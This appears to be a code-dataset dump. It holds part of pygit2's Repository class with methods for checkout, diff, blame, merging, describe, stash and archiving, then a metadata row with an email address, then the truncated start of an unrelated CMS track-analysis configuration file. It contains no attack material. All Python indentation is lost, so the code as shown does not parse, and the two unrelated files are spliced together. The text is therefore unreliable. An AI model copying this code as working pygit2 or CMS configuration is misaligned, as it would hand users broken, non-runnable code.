cptr = ffi.new('git_object **')
ffi.buffer(cptr)[:] = treeish._pointer[:]
check_error(C.git_checkout_tree(self._repo, cptr[0], copts))
def checkout(self, refname=None, **kwargs):
"""
Checkout the given reference using the given strategy, and update the
HEAD.
The reference may be a reference name or a Reference object.
The default strategy is GIT_CHECKOUT_SAFE | GIT_CHECKOUT_RECREATE_MISSING.
If no reference is given, checkout from the index.
Parameters:
refname : str or Reference
The reference to checkout. After checkout, the current branch will
be switched to this one.
strategy : int
A ``GIT_CHECKOUT_`` value. The default is ``GIT_CHECKOUT_SAFE``.
directory : str
Alternative checkout path to workdir.
paths : list[str]
A list of files to checkout from the given reference.
If paths is provided, HEAD will not be set to the reference.
Examples:
* To checkout from the HEAD, just pass 'HEAD'::
>>> checkout('HEAD')
This is identical to calling checkout_head().
"""
# Case 1: Checkout index
if refname is None:
return self.checkout_index(**kwargs)
# Case 2: Checkout head
if refname == 'HEAD':
return self.checkout_head(**kwargs)
# Case 3: Reference
if isinstance(refname, Reference):
reference = refname
refname = refname.name
else:
reference = self.lookup_reference(refname)
oid = reference.resolve().target
treeish = self[oid]
self.checkout_tree(treeish, **kwargs)
if 'paths' not in kwargs:
self.set_head(refname)
#
# Setting HEAD
#
def set_head(self, target):
"""
Set HEAD to point to the given target.
Parameters:
target
The new target for HEAD. Can be a string or Oid (to detach).
"""
if isinstance(target, Oid):
oid = ffi.new('git_oid *')
ffi.buffer(oid)[:] = target.raw[:]
err = C.git_repository_set_head_detached(self._repo, oid)
check_error(err)
return
# if it's a string, then it's a reference name
err = C.git_repository_set_head(self._repo, to_bytes(target))
check_error(err)
#
# Diff
#
def __whatever_to_tree_or_blob(self, obj):
if obj is None:
return None
# If it's a string, then it has to be valid revspec
if isinstance(obj, str) or isinstance(obj, bytes):
obj = self.revparse_single(obj)
elif isinstance(obj, Oid):
obj = self[obj]
# First we try to get to a blob
try:
obj = obj.peel(Blob)
except Exception:
# And if that failed, try to get a tree, raising a type
# error if that still doesn't work
try:
obj = obj.peel(Tree)
except Exception:
raise TypeError('unexpected "%s"' % type(obj))
return obj
def diff(self, a=None, b=None, cached=False, flags=GIT_DIFF_NORMAL,
context_lines=3, interhunk_lines=0):
"""
Show changes between the working tree and the index or a tree,
changes between the index and a tree, changes between two trees, or
changes between two blobs.
Keyword arguments:
a
None, a str (that refers to an Object, see revparse_single()) or a
Reference object.
If None, b must be None, too. In this case the working directory is
compared with the index. Otherwise the referred object is compared to
'b'.
b
None, a str (that refers to an Object, see revparse_single()) or a
Reference object.
If None, the working directory is compared to 'a'. (except
'cached' is True, in which case the index is compared to 'a').
Otherwise the referred object is compared to 'a'
cached
If 'b' is None, by default the working directory is compared to 'a'.
If 'cached' is set to True, the index/staging area is used for comparing.
flag
A combination of GIT_DIFF_* constants. For a list of the constants,
with a description, see git_diff_option_t in
https://github.com/libgit2/libgit2/blob/master/include/git2/diff.h
context_lines
The number of unchanged lines that define the boundary of a hunk
(and to display before and after)
interhunk_lines
The maximum number of unchanged lines between hunk boundaries
before the hunks will be merged into a one
Examples::
# Changes in the working tree not yet staged for the next commit
>>> diff()
# Changes between the index and your last commit
>>> diff(cached=True)
# Changes in the working tree since your last commit
>>> diff('HEAD')
# Changes between commits
>>> t0 = revparse_single('HEAD')
>>> t1 = revparse_single('HEAD^')
>>> diff(t0, t1)
>>> diff('HEAD', 'HEAD^') # equivalent
If you want to diff a tree against an empty tree, use the low level
API (Tree.diff_to_tree()) directly.
"""
a = self.__whatever_to_tree_or_blob(a)
b = self.__whatever_to_tree_or_blob(b)
opt_keys = ['flags', 'context_lines', 'interhunk_lines']
opt_values = [flags, context_lines, interhunk_lines]
# Case 1: Diff tree to tree
if isinstance(a, Tree) and isinstance(b, Tree):
return a.diff_to_tree(b, **dict(zip(opt_keys, opt_values)))
# Case 2: Index to workdir
elif a is None and b is None:
return self.index.diff_to_workdir(*opt_values)
# Case 3: Diff tree to index or workdir
elif isinstance(a, Tree) and b is None:
if cached:
return a.diff_to_index(self.index, *opt_values)
else:
return a.diff_to_workdir(*opt_values)
# Case 4: Diff blob to blob
if isinstance(a, Blob) and isinstance(b, Blob):
return a.diff(b)
raise ValueError("Only blobs and treeish can be diffed")
def state_cleanup(self):
"""Remove all the metadata associated with an ongoing command like
merge, revert, cherry-pick, etc. For example: MERGE_HEAD, MERGE_MSG,
etc.
"""
C.git_repository_state_cleanup(self._repo)
#
# blame
#
def blame(self, path, flags=None, min_match_characters=None,
newest_commit=None, oldest_commit=None, min_line=None,
max_line=None):
"""
Return a Blame object for a single file.
Parameters:
path
Path to the file to blame.
flags
A GIT_BLAME_* constant.
min_match_characters
The number of alphanum chars that must be detected as moving/copying
within a file for it to associate those lines with the parent commit.
newest_commit
The id of the newest commit to consider.
oldest_commit
The id of the oldest commit to consider.
min_line
The first line in the file to blame.
max_line
The last line in the file to blame.
Examples::
repo.blame('foo.c', flags=GIT_BLAME_TRACK_COPIES_SAME_FILE)
"""
options = ffi.new('git_blame_options *')
C.git_blame_init_options(options, C.GIT_BLAME_OPTIONS_VERSION)
if min_match_characters:
options.min_match_characters = min_match_characters
if newest_commit:
if not isinstance(newest_commit, Oid):
newest_commit = Oid(hex=newest_commit)
ffi.buffer(ffi.addressof(options, 'newest_commit'))[:] = newest_commit.raw
if oldest_commit:
if not isinstance(oldest_commit, Oid):
oldest_commit = Oid(hex=oldest_commit)
ffi.buffer(ffi.addressof(options, 'oldest_commit'))[:] = oldest_commit.raw
if min_line:
options.min_line = min_line
if max_line:
options.max_line = max_line
cblame = ffi.new('git_blame **')
err = C.git_blame_file(cblame, self._repo, to_bytes(path), options)
check_error(err)
return Blame._from_c(self, cblame[0])
#
# Index
#
@property
def index(self):
"""Index representing the repository's index file."""
cindex = ffi.new('git_index **')
err = C.git_repository_index(cindex, self._repo)
check_error(err, io=True)
return Index.from_c(self, cindex)
#
# Merging
#
_FAVOR_TO_ENUM = {
'normal': C.GIT_MERGE_FILE_FAVOR_NORMAL,
'ours': C.GIT_MERGE_FILE_FAVOR_OURS,
'theirs': C.GIT_MERGE_FILE_FAVOR_THEIRS,
'union': C.GIT_MERGE_FILE_FAVOR_UNION,
}
_MERGE_FLAG_TO_ENUM = {
'find_renames': C.GIT_MERGE_FIND_RENAMES,
'fail_on_conflict': C.GIT_MERGE_FAIL_ON_CONFLICT,
'skip_reuc': C.GIT_MERGE_SKIP_REUC,
'no_recursive': C.GIT_MERGE_NO_RECURSIVE,
}
_MERGE_FLAG_DEFAULTS = {
'find_renames': True,
}
_MERGE_FILE_FLAG_TO_ENUM = {
'standard_style': C.GIT_MERGE_FILE_STYLE_MERGE,
'diff3_style': C.GIT_MERGE_FILE_STYLE_DIFF3,
'simplify_alnum': C.GIT_MERGE_FILE_SIMPLIFY_ALNUM,
'ignore_whitespace': C.GIT_MERGE_FILE_IGNORE_WHITESPACE,
'ignore_whitespace_change': C.GIT_MERGE_FILE_IGNORE_WHITESPACE_CHANGE,
'ignore_whitespace_eol': C.GIT_MERGE_FILE_IGNORE_WHITESPACE_EOL,
'patience': C.GIT_MERGE_FILE_DIFF_PATIENCE,
'minimal': C.GIT_MERGE_FILE_DIFF_MINIMAL,
}
_MERGE_FILE_FLAG_DEFAULTS = {}
@classmethod
def _flag_dict_to_bitmask(cls, flag_dict, flag_defaults, mapping, label):
"""
Converts a dict eg {"find_renames": True, "skip_reuc": True} to
a bitmask eg C.GIT_MERGE_FIND_RENAMES | C.GIT_MERGE_SKIP_REUC.
"""
merged_dict = {**flag_defaults, **flag_dict}
bitmask = 0
for k, v in merged_dict.items():
enum = mapping.get(k, None)
if enum is None:
raise ValueError("unknown %s: %s" % (label, k))
if v:
bitmask |= enum
return bitmask
@classmethod
def _merge_options(cls, favor='normal', flags={}, file_flags={}):
"""Return a 'git_merge_opts *'"""
favor_val = cls._FAVOR_TO_ENUM.get(favor, None)
if favor_val is None:
raise ValueError("unknown favor: %s" % favor)
flags_bitmask = Repository._flag_dict_to_bitmask(
flags,
cls._MERGE_FLAG_DEFAULTS,
cls._MERGE_FLAG_TO_ENUM,
"merge flag"
)
file_flags_bitmask = cls._flag_dict_to_bitmask(
file_flags,
cls._MERGE_FILE_FLAG_DEFAULTS,
cls._MERGE_FILE_FLAG_TO_ENUM,
"merge file_flag"
)
opts = ffi.new('git_merge_options *')
err = C.git_merge_init_options(opts, C.GIT_MERGE_OPTIONS_VERSION)
check_error(err)
opts.file_favor = favor_val
opts.flags = flags_bitmask
opts.file_flags = file_flags_bitmask
return opts
def merge_file_from_index(self, ancestor, ours, theirs):
"""Merge files from index. Return a string with the merge result
containing possible conflicts.
ancestor
The index entry which will be used as a common
ancestor.
ours
The index entry to take as "ours" or base.
theirs
The index entry which will be merged into "ours"
"""
cmergeresult = ffi.new('git_merge_file_result *')
cancestor, ancestor_str_ref = (
ancestor._to_c() if ancestor is not None else (ffi.NULL, ffi.NULL))
cours, ours_str_ref = (
ours._to_c() if ours is not None else (ffi.NULL, ffi.NULL))
ctheirs, theirs_str_ref = (
theirs._to_c() if theirs is not None else (ffi.NULL, ffi.NULL))
err = C.git_merge_file_from_index(
cmergeresult, self._repo,
cancestor, cours, ctheirs,
ffi.NULL);
check_error(err)
ret = ffi.string(cmergeresult.ptr,
cmergeresult.len).decode('utf-8')
C.git_merge_file_result_free(cmergeresult)
return ret
def merge_commits(self, ours, theirs, favor='normal', flags={}, file_flags={}):
"""
Merge two arbitrary commits.
Returns: an index with the result of the merge.
Parameters:
ours
The commit to take as "ours" or base.
theirs
The commit which will be merged into "ours"
favor
How to deal with file-level conflicts. Can be one of
* normal (default). Conflicts will be preserved.
* ours. The "ours" side of the conflict region is used.
* theirs. The "theirs" side of the conflict region is used.
* union. Unique lines from each side will be used.
For all but NORMAL, the index will not record a conflict.
flags
A dict of str: bool to turn on or off functionality while merging.
If a key is not present, the default will be used. The keys are:
* find_renames. Detect file renames. Defaults to True.
* fail_on_conflict. If a conflict occurs, exit immediately instead
of attempting to continue resolving conflicts.
* skip_reuc. Do not write the REUC extension on the generated index.
* no_recursive. If the commits being merged have multiple merge
bases, do not build a recursive merge base (by merging the
multiple merge bases), instead simply use the first base.
file_flags
A dict of str: bool to turn on or off functionality while merging.
If a key is not present, the default will be used. The keys are:
* standard_style. Create standard conflicted merge files.
* diff3_style. Create diff3-style file.
* simplify_alnum. Condense non-alphanumeric regions for simplified
diff file.
* ignore_whitespace. Ignore all whitespace.
* ignore_whitespace_change. Ignore changes in amount of whitespace.
* ignore_whitespace_eol. Ignore whitespace at end of line.
* patience. Use the "patience diff" algorithm
* minimal. Take extra time to find minimal diff
Both "ours" and "theirs" can be any object which peels to a commit or
the id (string or Oid) of an object which peels to a commit.
"""
ours_ptr = ffi.new('git_commit **')
theirs_ptr = ffi.new('git_commit **')
cindex = ffi.new('git_index **')
if isinstance(ours, (str, Oid)):
ours = self[ours]
if isinstance(theirs, (str, Oid)):
theirs = self[theirs]
ours = ours.peel(Commit)
theirs = theirs.peel(Commit)
opts = self._merge_options(favor, flags, file_flags)
ffi.buffer(ours_ptr)[:] = ours._pointer[:]
ffi.buffer(theirs_ptr)[:] = theirs._pointer[:]
err = C.git_merge_commits(cindex, self._repo, ours_ptr[0], theirs_ptr[0], opts)
check_error(err)
return Index.from_c(self, cindex)
def merge_trees(self, ancestor, ours, theirs, favor='normal', flags={}, file_flags={}):
"""
Merge two trees.
Returns: an Index that reflects the result of the merge.
Parameters:
ancestor
The tree which is the common ancestor between 'ours' and 'theirs'.
ours
The commit to take as "ours" or base.
theirs
The commit which will be merged into "ours".
favor
How to deal with file-level conflicts. Can be one of:
* normal (default). Conflicts will be preserved.
* ours. The "ours" side of the conflict region is used.
* theirs. The "theirs" side of the conflict region is used.
* union. Unique lines from each side will be used.
For all but NORMAL, the index will not record a conflict.
flags
A dict of str: bool to turn on or off functionality while merging.
If a key is not present, the default will be used. The keys are:
* find_renames. Detect file renames. Defaults to True.
* fail_on_conflict. If a conflict occurs, exit immediately instead
of attempting to continue resolving conflicts.
* skip_reuc. Do not write the REUC extension on the generated index.
* no_recursive. If the commits being merged have multiple merge
bases, do not build a recursive merge base (by merging the
multiple merge bases), instead simply use the first base.
file_flags
A dict of str: bool to turn on or off functionality while merging.
If a key is not present, the default will be used. The keys are:
* standard_style. Create standard conflicted merge files.
* diff3_style. Create diff3-style file.
* simplify_alnum. Condense non-alphanumeric regions for simplified
diff file.
* ignore_whitespace. Ignore all whitespace.
* ignore_whitespace_change. Ignore changes in amount of whitespace.
* ignore_whitespace_eol. Ignore whitespace at end of line.
* patience. Use the "patience diff" algorithm
* minimal. Take extra time to find minimal diff
"""
ancestor_ptr = ffi.new('git_tree **')
ours_ptr = ffi.new('git_tree **')
theirs_ptr = ffi.new('git_tree **')
cindex = ffi.new('git_index **')
if isinstance(ancestor, (str, Oid)):
ancestor = self[ancestor]
if isinstance(ours, (str, Oid)):
ours = self[ours]
if isinstance(theirs, (str, Oid)):
theirs = self[theirs]
ancestor = ancestor.peel(Tree)
ours = ours.peel(Tree)
theirs = theirs.peel(Tree)
opts = self._merge_options(favor, flags, file_flags)
ffi.buffer(ancestor_ptr)[:] = ancestor._pointer[:]
ffi.buffer(ours_ptr)[:] = ours._pointer[:]
ffi.buffer(theirs_ptr)[:] = theirs._pointer[:]
err = C.git_merge_trees(cindex, self._repo, ancestor_ptr[0], ours_ptr[0], theirs_ptr[0], opts)
check_error(err)
return Index.from_c(self, cindex)
#
# Describe
#
def describe(self, committish=None, max_candidates_tags=None,
describe_strategy=None, pattern=None,
only_follow_first_parent=None,
show_commit_oid_as_fallback=None, abbreviated_size=None,
always_use_long_format=None, dirty_suffix=None):
"""
Describe a commit-ish or the current working tree.
Returns: The description (str).
Parameters:
committish : `str`, :class:`~.Reference`, or :class:`~.Commit`
Commit-ish object or object name to describe, or `None` to describe
the current working tree.
max_candidates_tags : int
The number of candidate tags to consider. Increasing above 10 will
take slightly longer but may produce a more accurate result. A
value of 0 will cause only exact matches to be output.
describe_strategy : int
Can be one of:
* `GIT_DESCRIBE_DEFAULT` - Only match annotated tags. (This is
equivalent to setting this parameter to `None`.)
* `GIT_DESCRIBE_TAGS` - Match everything under refs/tags/
(includes lightweight tags).
* `GIT_DESCRIBE_ALL` - Match everything under refs/ (includes
branches).
pattern : str
Only consider tags matching the given `glob(7)` pattern, excluding
the "refs/tags/" prefix.
only_follow_first_parent : bool
Follow only the first parent commit upon seeing a merge commit.
show_commit_oid_as_fallback : bool
Show uniquely abbreviated commit object as fallback.
abbreviated_size : int
The minimum number of hexadecimal digits to show for abbreviated
object names. A value of 0 will suppress long format, only showing
the closest tag.
always_use_long_format : bool
Always output the long format (the nearest tag, the number of
commits, and the abbrevated commit name) even when the committish
matches a tag.
dirty_suffix : str
A string to append if the working tree is dirty.
Example::
repo.describe(pattern='public/*', dirty_suffix='-dirty')
"""
options = ffi.new('git_describe_options *')
C.git_describe_init_options(options, C.GIT_DESCRIBE_OPTIONS_VERSION)
if max_candidates_tags is not None:
options.max_candidates_tags = max_candidates_tags
if describe_strategy is not None:
options.describe_strategy = describe_strategy
if pattern:
# The returned pointer object has ownership on the allocated
# memory. Make sure it is kept alive until git_describe_commit() or
# git_describe_workdir() are called below.
pattern_char = ffi.new('char[]', to_bytes(pattern))
options.pattern = pattern_char
if only_follow_first_parent is not None:
options.only_follow_first_parent = only_follow_first_parent
if show_commit_oid_as_fallback is not None:
options.show_commit_oid_as_fallback = show_commit_oid_as_fallback
result = ffi.new('git_describe_result **')
if committish:
if isinstance(committish, str):
committish = self.revparse_single(committish)
commit = committish.peel(Commit)
cptr = ffi.new('git_object **')
ffi.buffer(cptr)[:] = commit._pointer[:]
err = C.git_describe_commit(result, cptr[0], options)
else:
err = C.git_describe_workdir(result, self._repo, options)
check_error(err)
try:
format_options = ffi.new('git_describe_format_options *')
C.git_describe_init_format_options(format_options, C.GIT_DESCRIBE_FORMAT_OPTIONS_VERSION)
if abbreviated_size is not None:
format_options.abbreviated_size = abbreviated_size
if always_use_long_format is not None:
format_options.always_use_long_format = always_use_long_format
dirty_ptr = None
if dirty_suffix:
dirty_ptr = ffi.new('char[]', to_bytes(dirty_suffix))
format_options.dirty_suffix = dirty_ptr
buf = ffi.new('git_buf *', (ffi.NULL, 0))
err = C.git_describe_format(buf, result[0], format_options)
check_error(err)
try:
return ffi.string(buf.ptr).decode('utf-8')
finally:
C.git_buf_dispose(buf)
finally:
C.git_describe_result_free(result[0])
#
# Stash
#
def stash(self, stasher, message=None, keep_index=False,
include_untracked=False, include_ignored=False):
"""
Save changes to the working directory to the stash.
Returns: The Oid of the stash merge commit (Oid).
Parameters:
stasher : Signature
The identity of the person doing the stashing.
message : str
An optional description of stashed state.
keep_index : bool
Leave changes already added to the index in the working directory.
include_untracked : bool
Also stash untracked files.
include_ignored : bool
Also stash ignored files.
Example::
>>> repo = pygit2.Repository('.')
>>> repo.stash(repo.default_signature(), 'WIP: stashing')
"""
if message:
stash_msg = ffi.new('char[]', to_bytes(message))
else:
stash_msg = ffi.NULL
flags = 0
flags |= keep_index * C.GIT_STASH_KEEP_INDEX
flags |= include_untracked * C.GIT_STASH_INCLUDE_UNTRACKED
flags |= include_ignored * C.GIT_STASH_INCLUDE_IGNORED
stasher_cptr = ffi.new('git_signature **')
ffi.buffer(stasher_cptr)[:] = stasher._pointer[:]
coid = ffi.new('git_oid *')
err = C.git_stash_save(coid, self._repo, stasher_cptr[0], stash_msg, flags)
check_error(err)
return Oid(raw=bytes(ffi.buffer(coid)[:]))
@staticmethod
def _stash_args_to_options(reinstate_index=False, **kwargs):
stash_opts = ffi.new('git_stash_apply_options *')
check_error(C.git_stash_apply_init_options(stash_opts, 1))
flags = reinstate_index * C.GIT_STASH_APPLY_REINSTATE_INDEX
stash_opts.flags = flags
copts, refs = Repository._checkout_args_to_options(**kwargs)
stash_opts.checkout_options = copts[0]
return stash_opts
def stash_apply(self, index=0, **kwargs):
"""
Apply a stashed state in the stash list to the working directory.
Parameters:
index : int
The position within the stash list of the stash to apply. 0 is the
most recent stash.
reinstate_index : bool
Try to reinstate stashed changes to the index.
The checkout options may be customized using the same arguments taken by
Repository.checkout().
Example::
>>> repo = pygit2.Repository('.')
>>> repo.stash(repo.default_signature(), 'WIP: stashing')
>>> repo.stash_apply(strategy=GIT_CHECKOUT_ALLOW_CONFLICTS)
"""
stash_opts = Repository._stash_args_to_options(**kwargs)
check_error(C.git_stash_apply(self._repo, index, stash_opts))
def stash_drop(self, index=0):
"""
Remove a stashed state from the stash list.
Parameters:
index : int
The position within the stash list of the stash to remove. 0 is
the most recent stash.
"""
check_error(C.git_stash_drop(self._repo, index))
def stash_pop(self, index=0, **kwargs):
"""Apply a stashed state and remove it from the stash list.
For arguments, see Repository.stash_apply().
"""
stash_opts = Repository._stash_args_to_options(**kwargs)
check_error(C.git_stash_pop(self._repo, index, stash_opts))
#
# Utility for writing a tree into an archive
#
def write_archive(self, treeish, archive, timestamp=None, prefix=''):
"""
Write treeish into an archive.
If no timestamp is provided and 'treeish' is a commit, its committer
timestamp will be used. Otherwise the current time will be used.
All path names in the archive are added to 'prefix', which defaults to
an empty string.
Parameters:
treeish
The treeish to write.
archive
An archive from the 'tarfile' module.
timestamp
Timestamp to use for the files in the archive.
prefix
Extra prefix to add to the path names in the archive.
Example::
>>> import tarfile, pygit2
>>>> with tarfile.open('foo.tar', 'w') as archive:
>>>> repo = pygit2.Repository('.')
>>>> repo.write_archive(repo.head.target, archive)
"""
# Try to get a tree form whatever we got
if isinstance(treeish, Tree):
tree = treeish
if isinstance(treeish, (str, Oid)):
treeish = self[treeish]
# if we don't have a timestamp, try to get it from a commit
if not timestamp:
try:
commit = treeish.peel(Commit)
timestamp = commit.committer.time
except Exception:
pass
# as a last resort, use the current timestamp
if not timestamp:
timestamp = int(time())
tree = treeish.peel(Tree)
index = Index()
index.read_tree(tree)
for entry in index:
content = self[entry.id].read_raw()
info = tarfile.TarInfo(prefix + entry.path)
info.size = len(content)
info.mtime = timestamp
info.uname = info.gname = 'root' # just because git does this
if entry.mode == GIT_FILEMODE_LINK:
info.type = tarfile.SYMTYPE
info.linkname = content.decode("utf-8")
info.mode = 0o777 # symlinks get placeholder
info.size = 0
archive.addfile(info)
else:
info.mode = tree[entry.path].filemode
archive.addfile(info, BytesIO(content))
#
# Ahead-behind, which mostly lives on its own namespace
#
def ahead_behind(self, local, upstream):
"""
Calculate how many different commits are in the non-common parts of the
history between the two given ids.
Ahead is how many commits are in the ancestry of the 'local' commit
which are not in the 'upstream' commit. Behind is the opposite.
Returns: a tuple of two integers with the number of commits ahead and
behind respectively.
Parameters:
local
The commit which is considered the local or current state.
upstream
The commit which is considered the upstream.
"""
if not isinstance(local, Oid):
local = self.expand_id(local)
if not isinstance(upstream, Oid):
upstream = self.expand_id(upstream)
ahead, behind = ffi.new('size_t*'), ffi.new('size_t*')
oid1, oid2 = ffi.new('git_oid *'), ffi.new('git_oid *')
ffi.buffer(oid1)[:] = local.raw[:]
ffi.buffer(oid2)[:] = upstream.raw[:]
err = C.git_graph_ahead_behind(ahead, behind, self._repo, oid1, oid2)
check_error(err)
return int(ahead[0]), int(behind[0])
#
# Git attributes
#
def get_attr(self, path, name, flags=0):
"""
Retrieve an attribute for a file by path.
Returns: a boolean, None if the value is unspecified, or string with
the value of the attribute.
Parameters:
path
The path of the file to look up attributes for, relative to the
workdir root.
name
The name of the attribute to look up.
flags
A combination of GIT_ATTR_CHECK_ flags which determine the
lookup order.
"""
cvalue = ffi.new('char **')
err = C.git_attr_get(cvalue, self._repo, flags, to_bytes(path), to_bytes(name))
check_error(err)
# Now let's see if we can figure out what the value is
attr_kind = C.git_attr_value(cvalue[0])
if attr_kind == C.GIT_ATTR_UNSPECIFIED_T:
return None
elif attr_kind == C.GIT_ATTR_TRUE_T:
return True
elif attr_kind == C.GIT_ATTR_FALSE_T:
return False
elif attr_kind == C.GIT_ATTR_VALUE_T:
return ffi.string(cvalue[0]).decode('utf-8')
assert False, "the attribute value from libgit2 is invalid"
#
# Identity for reference operations
#
@property
def ident(self):
cname = ffi.new('char **')
cemail = ffi.new('char **')
err = C.git_repository_ident(cname, cemail, self._repo)
check_error(err)
return (ffi.string(cname).decode('utf-8'), ffi.string(cemail).decode('utf-8'))
def set_ident(self, name, email):
"""Set the identity to be used for reference operations
Updates to some references also append data to their
reflog. You can use this method to set what identity will be
used. If none is set, it will be read from the configuration.
"""
err = C.git_repository_set_ident(self._repo, to_bytes(name), to_bytes(email))
check_error(err)
def revert_commit(self, revert_commit, our_commit, mainline=0):
"""
Reverts the given Commit against the given "our" Commit, producing an
Index that reflects the result of the revert.
Returns: an Index with the result of the revert.
Parameters:
revert_commit
The Commit to revert.
our_commit
The Commit to revert against (eg, HEAD).
mainline
The parent of the revert Commit, if it is a merge (i.e. 1, 2).
"""
cindex = ffi.new('git_index **')
revert_commit_ptr = ffi.new('git_commit **')
our_commit_ptr = ffi.new('git_commit **')
ffi.buffer(revert_commit_ptr)[:] = revert_commit._pointer[:]
ffi.buffer(our_commit_ptr)[:] = our_commit._pointer[:]
opts = ffi.new('git_merge_options *')
err = C.git_merge_init_options(opts, C.GIT_MERGE_OPTIONS_VERSION)
check_error(err)
err = C.git_revert_commit(
cindex, self._repo, revert_commit_ptr[0], our_commit_ptr[0], mainline, opts
)
check_error(err)
return Index.from_c(self, cindex)
class Branches:
def __init__(self, repository, flag=GIT_BRANCH_ALL, commit=None):
self._repository = repository
self._flag = flag
if commit is not None:
if isinstance(commit, Commit):
commit = commit.id
elif not isinstance(commit, Oid):
commit = self._repository.expand_id(commit)
self._commit = commit
if flag == GIT_BRANCH_ALL:
self.local = Branches(repository, flag=GIT_BRANCH_LOCAL, commit=commit)
self.remote = Branches(repository, flag=GIT_BRANCH_REMOTE, commit=commit)
def __getitem__(self, name):
branch = None
if self._flag & GIT_BRANCH_LOCAL:
branch = self._repository.lookup_branch(name, GIT_BRANCH_LOCAL)
if branch is None and self._flag & GIT_BRANCH_REMOTE:
branch = self._repository.lookup_branch(name, GIT_BRANCH_REMOTE)
if branch is None or not self._valid(branch):
raise KeyError('Branch not found: {}'.format(name))
return branch
def get(self, key):
try:
return self[key]
except KeyError:
return None
def __iter__(self):
for branch_name in self._repository.listall_branches(self._flag):
if self._commit is None or self.get(branch_name) is not None:
yield branch_name
def create(self, name, commit, force=False):
return self._repository.create_branch(name, commit, force)
def delete(self, name):
self[name].delete()
def _valid(self, branch):
if branch.type == GIT_REF_SYMBOLIC:
branch = branch.resolve()
return (
self._commit is None
or branch.target == self._commit
or self._repository.descendant_of(branch.target, self._commit)
)
def with_commit(self, commit):
assert self._commit is None
return Branches(self._repository, self._flag, commit)
def __contains__(self, name):
return self.get(name) is not None
class References:
def __init__(self, repository):
self._repository = repository
def __getitem__(self, name):
return self._repository.lookup_reference(name)
def get(self, key):
try:
return self[key]
except KeyError:
return None
def __iter__(self):
for ref_name in self._repository.listall_references():
yield ref_name
def create(self, name, target, force=False):
return self._repository.create_reference(name, target, force)
def delete(self, name):
self[name].delete()
def __contains__(self, name):
return self.get(name) is not None
@property
def objects(self):
return self._repository.listall_reference_objects()
def compress(self):
return self._repository.compress_references()
class Repository(BaseRepository):
def __init__(self, *args, **kwargs):
if len(args) != 0:
path = args[0]
args = args[1:]
if hasattr(path, "__fspath__"):
path = path.__fspath__()
if not isinstance(path, str):
path = path.decode('utf-8')
path_backend = init_file_backend(path)
super().__init__(path_backend, *args, **kwargs)
else:
super().__init__(*args, **kwargs)
@classmethod
def _from_c(cls, ptr, owned):
cptr = ffi.new('git_repository **')
cptr[0] = ptr
repo = cls.__new__(cls)
super(cls, repo)._from_c(bytes(ffi.buffer(cptr)[:]), owned)
repo._common_init()
return repo
| [
"veerankisalmanraj@gmail.com"
] | veerankisalmanraj@gmail.com |
f2fdbcd6bc145b6ac96878bd70741c1cf8492916 | c99988740dfd759e999f40a942c3d7d290188e6d | /HeavyIonsAnalysis/TrackAnalysis/python/crab_20200921_073540/inputs/PSetDump.py | 35fa94ca931bc0e0510d388145724c23987461af | [] | no_license | yszhang95/miniAOD_tree_production | e6fa5fc77eb26006061e5558bc5eae0842ef2591 | 3b33454e6fd17eecb576f9a92545ff917684d170 | refs/heads/master | 2022-12-31T00:36:56.716163 | 2020-10-19T18:00:25 | 2020-10-19T18:00:25 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 31,315 | py | import FWCore.ParameterSet.Config as cms
process = cms.Process("Analysis")
process.source = cms.Source("PoolSource",
duplicateCheckMode = cms.untracked.string('noDuplicateCheck'),
fileNames = cms.untracked.vstring('/store/group/phys_heavyions/FECEF784-7DCA-984D-AF75-1991ACA0747A.root')
)
process.HFRecalParameterBlock = cms.PSet(
HFdepthOneParameterA = cms.vdouble(
0.004123, 0.00602, 0.008201, 0.010489, 0.013379,
0.016997, 0.021464, 0.027371, 0.034195, 0.044807,
0.058939, 0.125497
),
HFdepthOneParameterB = cms.vdouble(
-4e-06, -2e-06, 0.0, 4e-06, 1.5e-05,
2.6e-05, 6.3e-05, 8.4e-05, 0.00016, 0.000107,
0.000425, 0.000209
),
HFdepthTwoParameterA = cms.vdouble(
0.002861, 0.004168, 0.0064, 0.008388, 0.011601,
0.014425, 0.018633, 0.023232, 0.028274, 0.035447,
0.051579, 0.086593
),
HFdepthTwoParameterB = cms.vdouble(
-2e-06, -0.0, -7e-06, -6e-06, -2e-06,
1e-06, 1.9e-05, 3.1e-05, 6.7e-05, 1.2e-05,
0.000157, -3e-06
)
)
process.maxEvents = cms.untracked.PSet(
input = cms.untracked.int32(-1)
)
process.randomEngineStateProducer = cms.EDProducer("RandomEngineStateProducer")
process.hlt = cms.EDFilter("HLTHighLevel",
HLTPaths = cms.vstring('HLT_PFJet500*'),
TriggerResultsTag = cms.InputTag("TriggerResults","","HLT"),
andOr = cms.bool(True),
eventSetupPathsKey = cms.string(''),
throw = cms.bool(False)
)
process.analyzer = cms.EDAnalyzer("TrackAnalyzer",
beamSpotSrc = cms.untracked.InputTag("offlineBeamSpot"),
doTrack = cms.untracked.bool(True),
jets2 = cms.InputTag("slimmedJetsPuppi"),
lostTracksSrc = cms.InputTag("lostTracks"),
packedCandSrc = cms.InputTag("packedPFCandidates"),
trackPtMin = cms.untracked.double(0.01),
vertexSrc = cms.InputTag("offlineSlimmedPrimaryVertices")
)
process.DQMStore = cms.Service("DQMStore",
LSbasedMode = cms.untracked.bool(False),
collateHistograms = cms.untracked.bool(False),
enableMultiThread = cms.untracked.bool(False),
forceResetOnBeginLumi = cms.untracked.bool(False),
referenceFileName = cms.untracked.string(''),
saveByLumi = cms.untracked.bool(False),
verbose = cms.untracked.int32(0),
verboseQT = cms.untracked.int32(0)
)
process.MessageLogger = cms.Service("MessageLogger",
FrameworkJobReport = cms.untracked.PSet(
FwkJob = cms.untracked.PSet(
limit = cms.untracked.int32(10000000),
optionalPSet = cms.untracked.bool(True)
),
default = cms.untracked.PSet(
limit = cms.untracked.int32(0)
),
optionalPSet = cms.untracked.bool(True)
),
categories = cms.untracked.vstring(
'FwkJob',
'FwkReport',
'FwkSummary',
'Root_NoDictionary'
),
cerr = cms.untracked.PSet(
FwkJob = cms.untracked.PSet(
limit = cms.untracked.int32(0),
optionalPSet = cms.untracked.bool(True)
),
FwkReport = cms.untracked.PSet(
limit = cms.untracked.int32(10000000),
optionalPSet = cms.untracked.bool(True),
reportEvery = cms.untracked.int32(1)
),
FwkSummary = cms.untracked.PSet(
limit = cms.untracked.int32(10000000),
optionalPSet = cms.untracked.bool(True),
reportEvery = cms.untracked.int32(1)
),
INFO = cms.untracked.PSet(
limit = cms.untracked.int32(0)
),
Root_NoDictionary = cms.untracked.PSet(
